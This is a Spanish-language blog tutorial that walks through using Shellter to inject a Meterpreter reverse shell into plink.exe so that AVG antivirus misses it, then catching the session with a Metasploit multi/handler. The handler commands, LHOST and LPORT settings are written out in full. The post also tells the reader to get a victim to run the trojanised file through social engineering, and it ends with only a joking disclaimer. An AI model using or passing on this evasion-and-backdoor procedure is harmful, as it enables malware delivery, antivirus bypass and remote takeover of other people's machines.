Shellter & Metasploit: Evading analysis engine

Técnicas de “evasión” de – antivirus – hay muchas (bastante diversas) y evolucionan cada día, sin embargo cada cierto tiempo van apareciendo nuevas técnicas – unas mejores que otras – haciendo que los métodos sean cada vez más eficientes.

Shellter (una herramienta de inyección de shell dinámica, según sus creadores) es la primera “tal vez” en infectar – PE dinámico -, se puede usar para inyectar shells en software para  Windows y por ahora  solo en plataformas de 32 bits.

Captura: Descripción "Shellter" (en inglés... xdd).
Captura: Descripción “Shellter” (en inglés… xdd).

Shellter aprovecha la estructura original del PE en los archivos y no aplica ninguna modificación, añade una sección extra con RWE, además usa un enfoque dinámico único, lo cual hace que sea imperceptible para los antivirus.

Descripción "Shellter" (si, en inglés... otra vez, xdd).
Descripción “Shellter” (si, en inglés… otra vez, xdd).

Vamos a ver como se usa… }:P


1-) ESCENARIO

Captura: Windows 7 con motor de análisis "AVG Antivirus".
Captura: Windows 7 con motor de análisisAVG Antivirus“.

-) Kali Linux en la IP – 192.168.1.36 -.

-) Windows 7 con AVG Antivirus en la IP – 192.168.1.35 -.

2-) SETUP

Captura: Shellter, para ir a la web y descargar la versión pincha en la imagen
Captura: Shellter, para ir a la web y descargar la versión pincha en la imagen

-) Vamos a usar la versión 4.0 de Shellter, descargamos, instalamos, etc.

Captura: Sitio alternativo para la descarga de Shellter. Pincha en la imagen para ir a la descarga.
Captura: Sitio alternativo para la descarga de Shellter. Pincha en la imagen para ir a la descarga.

-) Unzip shellter.zip (descomprime el .zip).

-) mv shellter /usr/share/

3-) INICIAR SHELLTER

Captura: Vamos a usar el archivo “plink.exe” el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .
Captura: Vamos a usar el archivo “plink.exe” el cual se ubica en Kali Linux y moverlo a la carpeta donde tenemos shellter .

-) cp /usr/share/windowsbinaries/plink.exe /usr/share/shellter/

Luego iniciaremos shellter de la siguiente forma:

Captura: wineconsole shellter.exe.
Captura: wineconsole shellter.exe.

4-) CONFIGURACIÓN DE SHELLTER

Captura: Escojer modo automatico con la opción “A”.
Captura: Escojer modo automatico con la opciónA”.

-) Luego indicaremos el programa al cual le inyectaremos el shell code, el cual es el archivo  plink.exe – previamente copiado.

Captura: PE Targer: plink.exe.
Captura: PE Targer: plink.exe.

-) Luego cuando aparezca la lista de payloads elegir la opciónL
Use a listed payload or custom: L

Captura: Luego elegir la opcion “1”.
Captura: Luego elegir la opcion1”.

-) Select payload by index: 1

Captura: Ahora configuraremos los datos de retorno del shell reverso.
Captura: Ahora configuramos los datos de retorno del shell reverso.

-) set LHOST : 192.168.1.36 (IP de Kali Linux)

-) set LPORT : 5555 (puertos donde retornará la shell)

Shellter & Metasploit - BLOG - 13

-) Finalmente si todo ha salido bien, tendremos un mensaje “Inyection Verified” y luego presionamos “Enter” y finalizaremos shellter.

Captura: Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.
Captura: Con esto hemos conseguido que el archivo plink.exe esté infectado con el shell reverso.

5-) ACTIVANDO EL HANDLER CON METASPLOIT

Captura: Iniciamos con msfconsole.
Captura: Iniciamos con msfconsole.

-) Ahora pondremos a la escucha el handler en el puerto 5555

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.36

set lport 5555

exploit

Shellter & Metasploit - BLOG - 16

6-) AHORA VAMOS A WINDOWS Y PROBAMOS

Captura: Mediante alguna técnica de ingeniería social (y de esas hay muchas) conseguimos que el archivo “plink.exe”  sea ejecutado en la víctima.
Captura: Mediante alguna técnica de ingeniería social (y de esas hay muchas) conseguimos que el archivo “plink.exe” sea ejecutado en la víctima.

-) Como podemos observar, tenemos una bonita sesión de meterpreter 😉 sin que el antivirus reaccione.

Shellter & Metasploit - BLOG - 18

-) Ahora podemos hacer un par de cositas:

Shellter & Metasploit - BLOG - 19

Shellter & Metasploit - BLOG - 20

-) Bueno, pues ya estamos adentro };] .., esperamos que salga pronto la versión para 64bits.


– NOTA IMPORTANTE –

Captura: No seais malos ;) ...
Captura: No seais malos 😉 …

TonyHAT - 131 - peq

Anuncios

Un comentario en “Shellter & Metasploit: Evading analysis engine”

Responder

Por favor, inicia sesión con uno de estos métodos para publicar tu comentario:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s